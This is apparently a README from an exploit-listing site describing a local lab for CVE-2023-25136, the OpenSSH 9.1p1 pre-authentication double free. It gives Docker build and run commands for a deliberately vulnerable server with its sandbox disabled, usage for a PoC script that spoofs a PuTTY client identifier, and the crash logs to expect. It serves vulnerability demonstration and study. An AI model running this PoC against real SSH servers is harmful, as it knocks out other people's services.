Share
## https://sploitus.com/exploit?id=79E28647-DE00-57D0-951D-58B91E69A88B
# CVE-2023-25136 Vulnerability Demonstration

This project provides a minimal local testing environment for demonstrating the **OpenSSH 9.1p1 pre-authentication double-free memory corruption vulnerability (CVE-2023-25136)**, and observing the server process crashing (DoS) effect. > Note: Both official and mainstream analyses believe that this vulnerability is “difficult to actually exploit for remote code execution” under default security configurations. This environment is primarily used to demonstrate memory errors and DoS effects. ## Environment Description

- **Target**:
  - An **OpenSSH 9.1p1** server running in a Docker container
  - Configured with a privilege-separated user `sshd`
  - To facilitate observing double-free crashes, `--with-sandbox=no` was used during construction, disabling seccomp sandbox
  - The container listens on port `22`, mapped externally to port `2222` on the host (WSL)

- **Attacker**:
  - On the same host/WSL as the target
  - Runs the PoC using Python3 + `paramiko`, constructing a specific SSH client identifier and initiating a pre-authentication handshake

Directory Structure:

- `Dockerfile`: Image for building the OpenSSH 9.1p1 vulnerability environment
- `poc.py`: Minimal PoC client, used to trigger double-free during the pre-authentication phase

## Prerequisites

Before performing the following operations in this directory, make sure that:

- **Docker** has been installed (It is recommended to use Docker Desktop in WSL2 or install Docker directly in WSL)
- **Python 3** and `pip` have been installed

## I. Target Setup (OpenSSH 9.1p1 in Docker)

1. **Build the image**

Execute in this directory:

```bash
docker build -t sshd-9.1p1-vuln .
```

2. **Start the container**

```bash
docker run --rm -d --name sshd-vuln -p 2222:22 sshd-9.1p1-vuln
```

Note:

- `--rm`: Automatically deletes the container after it exits
- `--name sshd-vuln`: Name of the container
- `-p 2222:22`: Maps port `22` inside the container to port `2222` on the host

3. **Confirm sshd running status**

```bash
docker ps
```

You should see something like:

```
CONTAINER ID   IMAGE              COMMAND               STATUS          PORTS
xxxxxx         sshd-9.1p1-vuln    "/usr/sbin/sshd -D…"  Up ... 0.0.0.0:2222->22/tcp
```

## How to Use the Attacker PoC

### 1. Install PoC dependencies

Execute in this directory:

```bash
pip install paramiko
```

### 2. Description of the PoC script (poc.py)

`poc.py` uses `paramiko.Transport` to actively establish a connection with the target SSH server, and during the pre-authentication phase, it forges a client identifier to attempt to trigger a double-free. Key features:

- Default target: `127.0.0.1:2222` (i.e., the local Docker container)
- Default client identifier: `SSH-2.0-PuTTY_Release_0.64`
- Provides simple command-line arguments:
  - `-t/--target`: Target IP (default `127.0.0.1`)

`-p/--port`: Target port (default `2222`)
  - `-c/--client-id`: Fake SSH client identifier
  - `--timeout`: Timeout duration (seconds)
  - `-v/--verbose`: Output detailed error messages

### 3. Running PoC

Ensure that the container `sshd-vuln` is already running. Execute in this directory:

```bash
python3 poc.py
```

Or specify parameters explicitly:

```bash
python3 poc.py -t 127.0.0.1 -p 2222 -v
```

Example of expected client output:

```text
==============================================
   CVE-2023-25136 OpenSSH Pre-Auth Double Free
              Minimal PoC Client
==============================================
[2024-xx-xx xx:xx:xx] Target: 127.0.0.1:2222, ClientID: SSH-2.0-PuTTY_Release_0.64
[+] Sending crafted pre-auth handshake... [-] Authentication failed or connection closed early. Please check the sshd log on the server for messages like 'free(): double free detected' to confirm if CVE-2023-25136 was triggered.
```

Note:

The client reporting "Authentication failed" or "connection closed" is expected behavior, as the server’s pre-authentication subprocess may crash or terminate the connection during processing. ## III. Expected results and verification methods

### 1. Server (container) logs

After running PoC, check the container logs on the host:

```bash
docker logs sshd-vuln
```

Expected output might look like this:

```text
Server listening on 0.0.0.0 port 22. Server listening on :: port 22. Invalid user  from 172.17.0.1 port xxxxx
free(): double free detected in tcache 2
```

Note:

- "Invalid user": Since PoC uses an empty username, OpenSSH records an attempt by an invalid user.
- "free(): double free detected in tcache 2": glibc detected a **double free** and terminated the current sshd subprocess. This is precisely the memory corruption/DoS phenomenon we want to observe in this experiment.

> Note: To see this line, we disabled the seccomp sandbox during OpenSSH construction (`--with-sandbox=no`). Otherwise, the sandbox might intercept abnormal behaviors before the double free and terminate the subprocess directly.

### 2. Effectiveness

In this experimental environment, PoC can reliably trigger the **DoS of the pre-authentication subprocess**, resulting in failure of the current SSH connection. The main `sshd` process continues to spawn new subprocesses for subsequent connections. Since the pre-authentication subprocess runs in a low-privilege environment with chroot and default multiple security mechanisms, researchers generally believe that it is highly difficult to achieve remote code execution solely through this double-free mechanism.